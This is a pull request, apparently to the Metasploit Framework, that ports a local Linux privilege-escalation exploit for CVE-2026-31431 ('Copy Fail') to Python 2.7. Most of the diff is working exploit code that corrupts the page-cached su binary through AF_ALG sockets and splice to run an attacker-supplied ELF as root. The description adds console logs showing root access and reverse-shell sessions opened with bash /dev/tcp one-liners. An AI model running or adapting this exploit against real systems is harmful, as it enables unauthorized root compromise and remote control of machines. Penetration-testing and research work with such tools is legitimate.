### PR TITLE
Copy Fail python2.7 support

### DIFF
--- a/data/exploits/CVE-2026-31431/CVE-2026-31431-check.py
+++ b/data/exploits/CVE-2026-31431/CVE-2026-31431-check.py
@@ -1,26 +1,49 @@
-#!/usr/bin/env python3
+#!/usr/bin/env python
+import ctypes
 import os
 import socket
+import struct
 import sys
 
 AF_ALG = 38
+ALG_TYPE = "aead"
 ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
+
+def _alg_bind(sock, alg_type, alg_name):
+    sa = struct.pack(
+        '=H14s2I64s',
+        AF_ALG,
+        alg_type.encode() if hasattr(alg_type, 'encode') else alg_type,
+        0, 0,
+        alg_name.encode() if hasattr(alg_name, 'encode') else alg_name
+    )
+    sa_buf = ctypes.create_string_buffer(sa, len(sa))
+    libc = ctypes.CDLL('libc.so.6', use_errno=True)
+    libc.bind.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_uint]
+    libc.bind.restype = ctypes.c_int
+    rc = libc.bind(sock.fileno(), sa_buf, ctypes.c_uint(len(sa)))
+    if rc != 0:
+        errno = ctypes.get_errno()
+        raise OSError(errno, os.strerror(errno) if errno != 0 else 'bind failed (errno unavailable)')
 
 def check():
     if not os.path.exists('/proc/crypto'):
         print('[-] /proc/crypto is missing.')
         return
-
     try:
         s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
-    except OSError as e:
-        print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
+    except (OSError, socket.error) as e:
+        msg = getattr(e, 'strerror', None) or str(e)
+        print('[-] AF_ALG socket family unavailable (' + msg + ').')
+        print('[*] Try: modprobe af_alg')
         return
 
     try:
-        s.bind(("aead", ALG_NAME))
-    except OSError as e:
-        print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
+        _alg_bind(s, ALG_TYPE, ALG_NAME)
+    except (OSError, socket.error) as e:
+        msg = getattr(e, 'strerror', None) or str(e)
+        print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + msg + ').')
+        print('[*] The required kernel modules may not be loaded. Try: modprobe algif_aead authencesn')
         return
     finally:
         s.close()

--- a/data/exploits/CVE-2026-31431/CVE-2026-31431-cleanup.py
+++ b/data/exploits/CVE-2026-31431/CVE-2026-31431-cleanup.py
@@ -1,9 +1,25 @@
+import ctypes
+import ctypes.util
 import os
-import shutil
 
-su_path = shutil.which('su')
+POSIX_FADV_DONTNEED = 4
+
+def _find_binary(name):
+    for d in os.environ.get('PATH', '/usr/bin:/bin:/usr/sbin:/sbin').split(os.pathsep):
+        p = os.path.join(d, name)
+        if os.path.isfile(p) and os.access(p, os.X_OK):
+            return p
+    return None
+
+def _posix_fadvise(fd, offset, length, advice):
+    libc = ctypes.CDLL(ctypes.util.find_library('c') or 'libc.so.6', use_errno=True)
+    libc.posix_fadvise.argtypes = [ctypes.c_int, ctypes.c_int64, ctypes.c_int64, ctypes.c_int]
+    libc.posix_fadvise.restype = ctypes.c_int
+    libc.posix_fadvise(fd, offset, length, advice)
+
+su_path = _find_binary('su')
 su_fd = os.open(su_path, os.O_RDONLY)
 try:
-    os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
+    _posix_fadvise(su_fd, 0, 0, POSIX_FADV_DONTNEED)
 finally:
     os.close(su_fd)

--- a/data/exploits/CVE-2026-31431/CVE-2026-31431.py
+++ b/data/exploits/CVE-2026-31431/CVE-2026-31431.py
@@ -1,11 +1,14 @@
-#!/usr/bin/env python3
-import os
+#!/usr/bin/env python
 import base64
-import shutil
+import ctypes
+import ctypes.util
+import os
 import socket
+import struct
 import sys
+import traceback
 import zlib
-
+ENABLE_LOGGING = True
 AF_ALG = 38
 ALG_SET_KEY = 1
 ALG_SET_IV = 2
@@ -14,17 +17,164 @@ ALG_SET_AEAD_ASSOCLEN = 4
 ALG_SET_AEAD_AUTHSIZE = 5
 SOL_ALG = 279
 
+_libc = ctypes.CDLL(ctypes.util.find_library('c') or 'libc.so.6', use_errno=True)
+_ptr_size = ctypes.sizeof(ctypes.c_void_p)
+_log_path = '/tmp/.cve_2026_31431.log'
+
+def _log(msg):
+    if not ENABLE_LOGGING:
+        return
+    try:
+        with open(_log_path, 'a') as f:
+            f.write('[*] ' + msg + '\n')
+            f.flush()
+    except Exception:
+        pass
+
+def _to_bytes(s):
+    if isinstance(s, bytes):
+        return s
+    return s.encode('latin-1')
+
+def _find_binary(name):
+    for d in os.environ.get('PATH', '/usr/bin:/bin:/usr/sbin:/sbin').split(os.pathsep):
+        p = os.path.join(d, name)
+        if os.path.isfile(p) and os.access(p, os.X_OK):
+            return p
+    return None
+
+def _alg_bind(sock, alg_type, alg_name):
+    # struct sockaddr_alg { u16 family; u8 type[14]; u32 feat; u32 mask; u8 name[64]; }
+    # https://www.kernel.org/doc/html/v6.1/crypto/userspace-if.html
+    sa = struct.pack(
+        '=H14s2I64s',
+        AF_ALG,
+        _to_bytes(alg_type), 0, 0,
+        _to_bytes(alg_name)
+    )
+    sa_buf = ctypes.create_string_buffer(sa, len(sa))
+    _libc.bind.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_uint]
+    _libc.bind.restype = ctypes.c_int
+    rc = _libc.bind(sock.fileno(), sa_buf, ctypes.c_uint(len(sa)))
+    if rc != 0:
+        errno = ctypes.get_errno()
+        raise OSError(errno, os.strerror(errno) if errno != 0 else 'bind failed')
+
+def _splice(fd_in, fd_out, length, offset_in=None, offset_out=None, flags=0):
+    """Call splice(2) via ctypes, compatible with Python 2 and 3."""
+    _libc.splice.argtypes = [
+        ctypes.c_int, ctypes.POINTER(ctypes.c_int64),
+        ctypes.c_int, ctypes.POINTER(ctypes.c_int64),
+        ctypes.c_size_t, ctypes.c_uint
+    ]
+    _libc.splice.restype = ctypes.c_long
+
+    off_in_p = None
+    off_out_p = None
+    if offset_in is not None:
+        off_in_p = ctypes.pointer(ctypes.c_int64(offset_in))
+    if offset_out is not None:
+        off_out_p = ctypes.pointer(ctypes.c_int64(offset_out))
+
+    rc = _libc.splice(fd_in, off_in_p, fd_out, off_out_p, length, flags)
+    if rc < 0:
+        errno = ctypes.get_errno()
+        raise OSError(errno, os.strerror(errno))
+    return rc
+
+def _sendmsg(sock_fd, data, ancdata, flags=0):
+    """Call sendmsg(2) via ctypes, compatible with Python 2 and 3."""
+    fd = sock_fd if isinstance(sock_fd, int) else sock_fd.fileno()
+    _log('sendmsg fallback: fd=%d, data_len=%d, ancdata_count=%d, flags=%d' % (fd, len(data), len(ancdata), flags))
+
+    # struct cmsghdr layout depends on pointer size:
+    #   32-bit: { uint32_t cmsg_len; int cmsg_level; int cmsg_type; }  = 12 bytes, align 4
+    #   64-bit: { size_t cmsg_len; int cmsg_level; int cmsg_type; }    = 16 bytes, align 8
+    if _ptr_size == 8:
+        cmsg_hdr_fmt = '=QII'
+        cmsg_align = 8
+    else:
+        cmsg_hdr_fmt = '=III'
+        cmsg_align = 4
+    cmsg_hdr_size = struct.calcsize(cmsg_hdr_fmt)
+
+    cmsg_buf = b''
+    for level, typ, cmsg_data in ancdata:
+        cmsg_len = cmsg_hdr_size + len(cmsg_data)
+        padded_len = (cmsg_len + cmsg_align - 1) & ~(cmsg_align - 1)
+        cmsg_buf += struct.pack(cmsg_hdr_fmt, cmsg_len, level, typ)
+        cmsg_buf += cmsg_data
+        cmsg_buf += b'\x00' * (padded_len - cmsg_len)
+
+    data_buf = ctypes.create_string_buffer(_to_bytes(data), len(data))
+    cmsg_buf_c = ctypes.create_string_buffer(cmsg_buf, len(cmsg_buf))
+
+    # struct iovec
+    class Iovec(ctypes.Structure):
+        _fields_ = [('iov_base', ctypes.c_void_p), ('iov_len', ctypes.c_size_t)]
+
+    # struct msghdr
+    class Msghdr(ctypes.Structure):
+        _fields_ = [
+            ('msg_name', ctypes.c_void_p),
+            ('msg_namelen', ctypes.c_uint),
+            ('msg_iov', ctypes.POINTER(Iovec)),
+            ('msg_iovlen', ctypes.c_size_t),
+            ('msg_control', ctypes.c_void_p),
+            ('msg_controllen', ctypes.c_size_t),
+            ('msg_flags', ctypes.c_int),
+        ]
+
+    iov = Iovec(ctypes.cast(data_buf, ctypes.c_void_p), len(data))
+    msg = Msghdr()
+    msg.msg_name = None
+    msg.msg_namelen = 0
+    msg.msg_iov = ctypes.pointer(iov)
+    msg.msg_iovlen = 1
+    msg.msg_control = ctypes.cast(cmsg_buf_c, ctypes.c_void_p)
+    msg.msg_controllen = len(cmsg_buf)
+    msg.msg_flags = 0
+
+    _log('sendmsg: iov_len=%d, controllen=%d, sizeof(Msghdr)=%d, sizeof(Iovec)=%d' %
+         (len(data), len(cmsg_buf), ctypes.sizeof(msg), ctypes.sizeof(iov)))
+
+    _libc.sendmsg.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int]
+    _libc.sendmsg.restype = ctypes.c_long
+    rc = _libc.sendmsg(fd, ctypes.byref(msg), flags)
+    _log('sendmsg returned: %d' % rc)
+    if rc < 0:
+        errno = ctypes.get_errno()
+        raise OSError(errno, os.strerror(errno))
+
 def setup_sock():
+    _log('Setting up AF_ALG socket...')
     sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
-    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
-    sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
-    sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
+    _alg_bind(sock, "aead", "authencesn(hmac(sha256),cbc(aes))")
+    _log('Bind successful')
+    key = bytearray.fromhex("0800010000000010" + "0" * 64) if hasattr(bytearray, 'fromhex') else \
+        ("0800010000000010" + "0" * 64).decode('hex')
+    sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes(key))
+    _log('Key set')
+    _log('setsockopt 4-arg not supported, using ctypes')
+    _libc.setsockopt.argtypes = [ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_uint]
+    _libc.setsockopt.restype = ctypes.c_int
+    rc = _libc.setsockopt(sock.fileno(), SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
+    if rc != 0:
+        errno = ctypes.get_errno()
+        raise OSError(errno, 'setsockopt ALG_SET_AEAD_AUTHSIZE failed: ' + os.strerror(errno))
+    _log('Auth size set')
     op_sock, _ = sock.accept()
+    # _libc.accept.restype = ctypes.c_int
+    # _libc.accept.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
+    # op_sock = _libc.accept(sock.fileno(), None, None)
+    _log('Accept successful, op_sock fd=%d' % op_sock.fileno())
     return op_sock
 
 def write(op_sock, su_fd, offset, chunk):
-    op_sock.sendmsg(
-        [b"A" * 4 + chunk],
+    op_fd = op_sock if isinstance(op_sock, int) else op_sock.fileno()
+    _sendmsg(
+        op_fd,
+        b"A" * 4 + _to_bytes(chunk),
         [
             (SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
             (SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
@@ -33,24 +183,93 @@ def write(op_sock, su_fd, offset, chunk):
         32768
     )
     r, w = os.pipe()
-    os.splice(su_fd, w, offset + 4, offset_src=0)
-    os.splice(r, op_sock.fileno(), offset + 4)
+    _log('splice 1: su_fd=%d -> w=%d, length=%d, offset_in=0' % (su_fd, w, offset + 4))
+    _splice(su_fd, w, offset + 4, offset_in=0)
+    _log('splice 2: r=%d -> op_fd=%d, length=%d' % (r, op_fd, offset + 4))
+    _splice(r, op_fd, offset + 4)
+    os.close(r)
+    os.close(w)
     try:
         op_sock.recv(8 + offset)
-    except:
+    except Exception:
         pass
 
-su_path = shutil.which('su')
-su_fd = os.open(su_path, os.O_RDONLY)
 try:
-    elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
-except:
-    print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
-    sys.exit(os.EX_USAGE)
+    _log('=== CVE-2026-31431 exploit starting ===')
+    _log('Python version: %s' % sys.version)
+    _log('Pointer size: %d bytes (%d-bit)' % (_ptr_size, _ptr_size * 8))
+    _log('Platform: %s' % sys.platform)
+    import platform as _plat
+    _log('Machine: %s' % _plat.machine())
+    _log('argc: %d' % len(sys.argv))
 
-op_sock = setup_sock()
-for i in range(0, len(elf), 4):
-    write(op_sock, su_fd, i, elf[i:i + 4])
-op_sock.close()
+    su_path = _find_binary('su')
+    if su_path is None:
+        print('[-] su binary not found')
+        sys.exit(1)
+    _log('Target binary: %s' % su_path)
 
-os.execvp(su_path, ["su"] + sys.argv[1:])
+    su_stat = os.stat(su_path)
+    _log('su size: %d bytes, mode: %s' % (su_stat.st_size, oct(su_stat.st_mode)))
+
+    su_fd = os.open(su_path, os.O_RDONLY)
+    _log('su_fd: %d' % su_fd)
+
+    try:
+        elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
+    except Exception as e:
+        _log('Failed to decode ELF: %s' % str(e))
+        print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
+        sys.exit(1)
+
+    _log('ELF payload: %d bytes, %d writes needed' % (len(elf), (len(elf) + 3) // 4))
+    if len(elf) >= 20:
+        hdr = elf[:20]
+        _log('ELF header: %s' % ' '.join('%02x' % (b if isinstance(b, int) else ord(b)) for b in hdr))
+        ei_class = hdr[4] if isinstance(hdr[4], int) else ord(hdr[4])
+        ei_data = hdr[5] if isinstance(hdr[5], int) else ord(hdr[5])
+        e_machine_off = 18
+        e_machine = struct.unpack_from('>H' if ei_data == 2 else '<H', elf, e_machine_off)[0]
+        _log('ELF class: %d (%s), data: %d (%s), e_machine: %d' % (
+            ei_class, {1: '32-bit', 2: '64-bit'}.get(ei_class, '?'),
+            ei_data, {1: 'LE', 2: 'BE'}.get(ei_data, '?'),
+            e_machine))
+    if len(elf) > su_stat.st_size:
+        _log('WARNING: ELF (%d) is larger than su (%d)! Writes will go beyond file size.' % (len(elf), su_stat.st_size))
+
+    op_sock = setup_sock()
+    _log('setup_sock() complete, starting writes')
+
+    for i in range(0, len(elf), 4):
+        chunk = elf[i:i + 4]
+        _log('Writing chunk %d/%d at offset %d (%d bytes)' % (i // 4 + 1, (len(elf) + 3) // 4, i, len(chunk)))
+        write(op_sock, su_fd, i, chunk)
+
+    op_sock.close()
+    os.close(su_fd)
+    _log('Page cache corruption complete')
+
+    # Verify the corruption by re-reading su from page cache
+    verify_fd = os.open(su_path, os.O_RDONLY)
+    verify_hdr = os.read(verify_fd, min(20, len(elf)))
+    os.close(verify_fd)
+    _log('Verify su header: %s' % ' '.join('%02x' % (b if isinstance(b, int) else ord(b)) for b in verify_hdr))
+    if verify_hdr[:4] == elf[:4]:
+        _log('Page cache corruption VERIFIED - ELF magic matches')
+    else:
+        _log('Page cache corruption FAILED - headers do not match')
+        _log('Expected: %s' % ' '.join('%02x' % (b if isinstance(b, int) else ord(b)) for b in elf[:4]))
+        _log('Got:      %s' % ' '.join('%02x' % (b if isinstance(b, int) else ord(b)) for b in verify_hdr[:4]))
+
+    _log('Executing: %s' % su_path)
+    sys.stdout.flush()
+    sys.stderr.flush()
+    os.execvp(su_path, ["su"])
+
+except SystemExit:
+    raise
+except Exception as e:
+    _log('EXCEPTION: %s' % str(e))
+    _log(traceback.format_exc())
+    print('[-] exploit failed: %s' % str(e))
+    sys.exit(1)

--- a/data/exploits/CVE-2026-31431/CVE-2026-31431.py
+++ b/data/exploits/CVE-2026-31431/CVE-2026-31431.py
@@ -8,7 +8,7 @@ import struct
 import sys
 import traceback
 import zlib
-ENABLE_LOGGING = True
+ENABLE_LOGGING = False
 AF_ALG = 38
 ALG_SET_KEY = 1
 ALG_SET_IV = 2
@@ -163,10 +163,20 @@ def setup_sock():
         errno = ctypes.get_errno()
         raise OSError(errno, 'setsockopt ALG_SET_AEAD_AUTHSIZE failed: ' + os.strerror(errno))
     _log('Auth size set')
-    op_sock, _ = sock.accept()
-    # _libc.accept.restype = ctypes.c_int
-    # _libc.accept.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
-    # op_sock = _libc.accept(sock.fileno(), None, None)
+    try:
+        op_sock, _ = sock.accept()
+    except (socket.error, OSError):
+        # Python 2.7 doesn't know AF_ALG in accept() -> getsockaddrlen fails
+        _log('socket.accept() failed, using ctypes accept()')
+        _libc.accept.restype = ctypes.c_int
+        _libc.accept.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
+        raw_fd = _libc.accept(sock.fileno(), None, None)
+        if raw_fd < 0:
+            errno = ctypes.get_errno()
+            raise OSError(errno, 'accept failed: ' + os.strerror(errno))
+        # Wrap into a real socket object so .recv()/.fileno() work normally
+        op_sock = socket.fromfd(raw_fd, AF_ALG, socket.SOCK_SEQPACKET)
+        os.close(raw_fd)  # fromfd() dups the fd
     _log('Accept successful, op_sock fd=%d' % op_sock.fileno())
     return op_sock
 
@@ -189,10 +199,15 @@ def write(op_sock, su_fd, offset, chunk):
     _splice(r, op_fd, offset + 4)
     os.close(r)
     os.close(w)
+    # Must recv the result before the next sendmsg, otherwise kernel returns EINVAL
+    recv_len = 8 + offset
     try:
-        op_sock.recv(8 + offset)
-    except Exception:
-        pass
+        if isinstance(op_sock, int):
+            os.read(op_sock, recv_len)
+        else:
+            op_sock.recv(recv_len)
+    except Exception as e:
+        _log('recv after write failed (offset=%d): %s' % (offset, str(e)))
 
 try:
     _log('=== CVE-2026-31431 exploit starting ===')

--- a/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
+++ b/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
@@ -67,13 +67,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    avaiable_modules = create_process('/bin/sh', args: ['-c', 'lsmod'])
-    # necessary modules algif_aead, authencesn and if_alg
-    unless avaiable_modules.include?('algif_aead') && avaiable_modules.include?('authencesn') && avaiable_modules.include?('af_alg')
-      print_error('The required kernel modules algif_aead, authencesn and af_alg are not loaded.')
-      return CheckCode::Safe
-    end
-
     stub_source = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2026-31431', 'CVE-2026-31431-check.py'))
     begin
       output = run_python_stub(stub_source)

--- a/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
+++ b/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
   def run_command(os_command)
     os_architecture = get_os_architecture
 
-    unless [ ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
+    unless [ ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
       # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.
       fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
     end

--- a/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
+++ b/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def find_exec_program
-    %w[python python3 python2.7].select(&method(:command_exists?)).first
+    %w[python python3 python2.7 python2].select(&method(:command_exists?)).first
   end
 
   def exploit

--- a/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
+++ b/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Xint Code',
           'rootsecdev', # cleanup technique and additional PoC
           'Spencer McIntyre', # metasploit module
-          'Diego Ledda' # metasploit module
+          'Diego Ledda' # metasploit module & python2.7 porting
         ],
         'DisclosureDate' => '2026-04-29',
         'License' => MSF_LICENSE,
@@ -67,6 +67,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    avaiable_modules = create_process('/bin/sh', args: ['-c', 'lsmod'])
+    # necessary modules algif_aead, authencesn and if_alg
+    unless avaiable_modules.include?('algif_aead') && avaiable_modules.include?('authencesn') && avaiable_modules.include?('af_alg')
+      print_error('The required kernel modules algif_aead, authencesn and af_alg are not loaded.')
+      return CheckCode::Safe
+    end
+
     stub_source = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2026-31431', 'CVE-2026-31431-check.py'))
     begin
       output = run_python_stub(stub_source)
@@ -96,13 +103,14 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Unknown("The exploit check failed: #{e}")
     end
 
+    vprint_status("run_command('id') returned: #{result.inspect}")
     return CheckCode::Vulnerable if result =~ /uid=0(\(\w+\))?/
 
     CheckCode::Safe('The target system is not exploitable.')
   end
 
   def find_exec_program
-    %w[python python3 python2].select(&method(:command_exists?)).first
+    %w[python python3 python2.7].select(&method(:command_exists?)).first
   end
 
   def exploit
@@ -129,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
   def run_command(os_command)
     os_architecture = get_os_architecture
 
-    unless [ ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
+    unless [ ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
       # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.
       fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
     end


### PR DESCRIPTION
Update the Copy Fail exploit to work on target having python2.7+

## x64

```
msf exploit(linux/local/cve_2026_31431_copy_fail) > run
[+] bash -c '0<&182-;exec 182<>/dev/tcp/192.168.3.10/4455;sh <&182 >&182 2>&182'
[*] Started reverse TCP handler on 192.168.3.10:4455 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python2.7' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Generated a 167 byte ELF executable...
[*] Triggering the vulnerability using Python...
[*] run_command('id') returned: "uid=0(root) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),138(sambashare)"
[+] The target is vulnerable.
[*] Generated a 236 byte ELF executable...
[*] Triggering the vulnerability using Python...
[*] Command shell session 3 opened (192.168.3.10:4455 -> 10.5.135.171:43234) at 2026-05-06 05:49:10 -0400

id
uid=0(root) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),138(sambashare)
^C
Abort session 3? [y/N]  [*] Session stream closed.
msf exploit(linux/local/cve_2026_31431_copy_fail) > exit
```

## ARMLE
```
msf exploit(linux/local/cve_2026_31431_copy_fail) > run
[+] bash -c '0<&107-;exec 107<>/dev/tcp/192.168.3.10/5566;sh <&107 >&107 2>&107'
[*] Started reverse TCP handler on 192.168.3.10:5566
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Generated a 164 byte ELF executable...
[*] Triggering the vulnerability using Python...
[*] run_command('id') returned: "uid=0(root) gid=1003(kali) groups=1003(kali),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),105(i2c),114(bluetooth),130(scanner),1000(gpio),1001(spi),1002(wireshark)"
[+] The target is vulnerable.
[*] Generated a 240 byte ELF executable...
[*] Triggering the vulnerability using Python...
[*] Command shell session 2 opened (192.168.3.10:5566 -> 10.5.132.212:57196) at 2026-05-11 09:49:52 -0400


id
uid=0(root) gid=1003(kali) groups=1003(kali),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),105(i2c),114(bluetooth),130(scanner),1000(gpio),1001(spi),1002(wireshark)
```